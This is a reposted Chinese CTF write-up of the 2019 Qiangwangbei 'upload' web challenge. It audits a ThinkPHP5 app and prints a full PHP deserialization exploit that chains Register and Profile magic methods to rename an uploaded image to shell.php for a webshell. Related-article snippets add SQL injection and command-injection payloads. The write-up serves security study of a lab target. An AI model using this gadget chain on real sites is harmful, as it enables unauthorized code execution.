强网杯Web部分review

最新推荐文章于 2024-01-20 17:01:34 发布
最新推荐文章于 2024-01-20 17:01:34 发布
阅读量339 收藏
点赞数
文章标签: php shell
原文链接:http://www.cnblogs.com/penight/p/10967161.html
版权

0x01

上个月强网杯结束,看了一下Web题目,代码审计及php 反序列化等。本着学习的态度,试着本地复现一下。靶机下载:https://github.com/glzjin/qwb_2019_upload

0x02 upload

注册账号并登入,登入之后可以上传图片,并且可以正常查看。这里可以想到与图片马结合进行getshell。

然后使用目录扫描器,发现 /www.tar.gz 可以下载源码。解压进行代码审计。tp5框架写的,看一下路由信息:

跟踪一下web模块下的各控制器,大致查看发现,访问这些页面都会调用 login_check 方法,而在该方法里面会将传进来的用户cookie值进行反序列化。

继续审计 application/web/controller/Profile.php 文件,这个类主要功能是上传文件。在upload_img()方法中,先检查是否登录,再判断是否有文件,然后获取后缀,解析图片判断是否为正常图片,再从临时文件复制到指定路径。最后有 __call 和 __get 两个魔术方法,其中 $this->except,$this->ext、$this->filename_tmp、$this->filename在反序列化时都可以控制。

__call()魔术方法的定义是在对象中调用一个不可访问方法时,它会被调用。所以需要一个可以触发 __call 方法的地方。而在 application/web/controller/Register.php 文件中存在 __destruct 方法,其中 $this->registed、$this->checker 也可以在反序列化时可控。如果把 $this->checker 赋值为 Register 类,而 Register 类没有 index 方法,所以调用的时候就会触发 __call 方法,这样就形成了一条完整的攻击链,操控 Profile 里的参数,控制其中的 upload_img 方法,改变文件名。

最终的EXP如下:

<?php
namespace app\web\controller;
use think\Controller;
class Register
{
    public $checker;
    public $registed = false;
    public function __construct($checker){
        $this->checker = $checker;
    }
}
class Profile
{
    public $filename_tmp = './upload/2e25bf05f23b63a5b1f744933543d723/00bf23e130fa1e525e332ff03dae345d.png';
    public $filename = './upload/2e25bf05f23b63a5b1f744933543d723/shell.php';
    public $ext = true;
    public $except = array('index' => 'upload_img');
}
$register = new Register(new Profile());
echo urlencode(base64_encode(serialize($register)));

 设置cookie,然后访问getshell。

 

转载于:https://www.cnblogs.com/penight/p/10967161.html

weixin_34183910
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
反序列化(强网杯2019—UPLOAD)
kid的博客
05-29 5867
反序列化(强网杯2019—UPLOAD) 前言 这里主要是复现一下强网杯2019web的第一题,UPLOAD。这是一道反序列化的题,反正我觉得挺难的,当时已经锁定了反序列化的方向也没能完成… 感谢大佬提供的复现环境:https://github.com/CTFTraining/qwb_2019_upload UPLOAD 进入靶场后首先是一个登陆注册页面 这里很自然的要想到有没有注入,简单的万能...
Review_web
03-27
Review_web
BUUCTF__[强网杯 2019]高明的黑客_题解
风过江南乱的博客
05-31 1729
前言 其实这题的唯一考点就是编写 python 脚本。 用了几天时间来看一下 python ,发现有些内容与我以前学的c语言差不多,只是换个形式而已,比如说 if 、for 、while 对文件操作等等。那最大的特点就是很多功能函数,开箱既用,只需要引用模块就行了。可能这就是面向对象编程的特点吧,你不知道它怎么实现的,你只知道它能干什么。 也有很多不一样的,比如说,迭代、元组、继承、异常处理等等。 还有一点是python2 和python3。有点差别,比如说 print 函数等等,python3 有些东西
强网杯2023
最新发布
2202_75317918的博客
01-20 1126
当时看到这个题目 也是觉得易懂 并且可以解出来的但是数字实在是过大了兄弟题目意思是计算2^27的阶乘,并获取得到每一位数的数字之和,flag即为该数字的sha256编码2^27为134217728gmpy2包是支持大数运算的,故利用其fac方法进行尝试,在等待一段时间后可以得到对应的结果参考了其他师傅的wp得到运行结果为:4495662081然后利用一个在线工具进行sha256加密即可得到flag。
[强网杯 2019]Upload
SopRomeo的博客
07-23 3342
有个注册,注册进去看看 根据题目意思,文件上传 发现用/.绕过, 发现他会更改你的图片的名字,并且转换成png格式 可是文件最后的名字我们并不能控制,emmmmmm 抓包发现cookie是一段base64 解出来发现是一段反序列化 发现img有我们的图片,尝试目录穿越 由此找到思路,一般反序列化都是需要看源码,那就扫目录看看 ...
[强网杯 2019]Upload 反序列化结合文件上传
scrawman的博客
12-05 1172
[强网杯 2019]Upload www.tar.gz发现源码,文件还有点大,是把整个工程文件都上传了。 用phpstrom打开的话会有断点提示,一处是在Register.php,另一处是在Index.php,是在提示我们用cookie传序列化字符串。 重点在Profile.php,毕竟文件上传都是在这里控制的,看到两个魔术方法__call和__get。调用本类中没有的方法触发__call,调用this->{$name},如果本类中也没有这个属性,调用__get。 再倒回去看index.php
review_web_front
05-07
在“review_web_front”这个压缩包中,我们很可能找到了一份前端开发者用来复习和准备面试的资源集合。这个压缩包的名称暗示了它专注于web前端领域,特别是JavaScript这一关键的编程语言。JavaScript是构建动态网页...
Web Submission and Review Software-开源
05-03
【标题】"Web Submission and Review Software-开源"是一款专为学术会议设计的基于Web的软件,旨在方便论文的提交和审阅。这款开源工具旨在优化会议的整个审核流程,从作者提交论文到最终的审阅和决策,为学术交流...
CodeReview工具
12-04
总之,Code Review工具如Jupiter和Reviewclipse是现代软件开发不可或缺的一部分,它们为团队提供了一种有效提升代码质量和团队协作的方式。通过熟练运用这些工具,开发者可以更好地管理代码,降低缺陷率,提高软件...
什么是CodeReview
01-30
Code Review是一种通过复查代码提高代码质量的过程,在XP方法中占有极为...本文中涉及的问题大部分针对JAVA类代码。同时本文不涉及CodeReview过程和组织。凡事知其然还要知其所以然,我们首先需要知道什么是CodeRevie
强网杯2019-web-随便注
wyj_1216 House
02-05 1954
题目 writeup 首先根据题目意思,知道是SQL注入 尝试进行注入 ?inject=1 1' 发现报错,想到利用#进行截断(注释掉) 1' # 回显正常 1' and 1=1# 1' and 1=2# 发现没有回显 判断字段数 1' order by 1# 1' order by 2# 1' order by 3# 到3时报错,故知字段数为2 尝试union联...
2020 第四届强网杯 线上赛Web_Writeup
末初的CSDN博客
08-27 2662
赛题类型强网先锋主动uploadFunhashweb辅助WebMisc 强网先锋 主动 首先题目长这样, 很明显是考查命令执行绕过过滤字符 <?php highlight_file("index.php"); if(preg_match("/flag/i", $_GET["ip"])) { die("no flag"); } system("ping -c 3 $_GET[ip]"); ?> 执行多条命令可以使用;分号或者|管道符闭合上一条命令 绕过方法很多,自己网上找,这
CTF-RE-webassembly (2019强网杯
SuperGate的博客
06-06 1832
打开之后得到三个同名文件,分别是.js .wasm .html .html用浏览器打开,发现让我们输入flag。由于.js在我电脑里好像打不开,没配置相关环境,所以选择通过.wasm进行逆向。 .wasm逆向的一般套路,用wasm2c将wasm转化成c伪代码,然后再用gcc -c命令编译但是不链接得到.o文件。注意编译时缺少什么文件就在wasm2c文件夹中复制过去即可。 .o文件用ida打开...
2017第二届广东省强网杯线上赛 Nonstandard
you_need_me的博客
04-21 1272
先拉入ida分析一下我们只要让sub_401480返回值为1就可以了他把我们输入的flag进行操作与byte_402120比较byte_402120的值,这里要把前面的6eh加上也就是‘n’,得到nAdtxA66nbbdxA71tUAE2AOlnnbtrAp1nQzGtAQGtrjC7===接着我们再看一下函数sub_401070发现有点长。。。 我截取了一部分发现红框里的代码每次以5个bit为一...
2017强网杯 web 解题思路总结
wkend的博客
04-10 2048
声明:首先这篇博文算不上原创,自己也是一个小白,在这里我主要参考了 这篇博客:https://blog.csdn.net/hardhard123/article/details/79683128 以及这篇writeup:https://www.ichunqiu.com/writeup/detail/503 写这篇博客的主要动机就是一边总结,一边学习,就当做是一篇学习笔记。 首先打开题目...
2020网鼎杯朱雀组_PHPweb
ro4lsc的博客
05-17 2267
前言 BUU上看到可以复现,那么按耐不住内心的我就开始肝。 进入主页 纳尼,这是个什么玩意。过了几秒 话不多说,查看源码 传递两个参数,func和p,抓包看看 如果我记得不错date应该是个函数,而p的值应该是date的参数,查查php手册 也就是说,这里可能可以执行php函数,那么首先肯定是要试试eval了 实锤可以执行了,但是这里肯定是有过滤的,怎么办呢?先试试读index.php的源码把 试试file_get_contents() 那么 <?php $disable_fu
2015广州强网杯--小心猪圈
weixin_44110537的博客
08-11 3687
encrypt R29kIGpvYjo1NzY1NkM2QzIwNjQ2RjZFNjUzQTRBMzU1ODQ3NTkzNjRBNDE0RTM1NTg0NzRCNDk0NDU0NEY1MjUzNTg0MTQ5NDQ0MjRGMzU1MTU4NTM0RjUzNTI0NzQ5MzQ1ODRCNTc1MjU0NEE0QTU1NDc0OTUzNDM1NzRGNEU0RDU2NTE1NTU0NTE0RDQ5NUE0NDRCMzY1MzUwNEU1NTM0NTc1NTU5NEM0RjQ5NDkzMzU3NEIzMzR
第三届广东省强网杯网络安全大赛WEB题writeup
qq_28205153的博客
11-04 4006
1. 小明又被拒绝了 直接访问根目录,报403错误 一般是做了ip限制,加上 X-Forwarded-For 头即可绕过 接着又提示不是管理员,仔细看响应头的 Set-Cookie ,有个 admin=0 ,很明显是通过Cookie来判断是否是管理员,直接在请求中加个 Cookie:admin=1 即可绕过,获取flag. 2.XX? 直接访问根目录,发现是个百度页面,看了下源码,没什...
under review
07-28
Under review是指论文正在被审稿人进行评审的状态。在这个阶段,审稿人会对论文进行详细的评估,包括对论文的质量、方法、结果和结论的评价。审稿人可能会提出修改意见或建议,以帮助作者进一步完善论文。\[1\]在...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值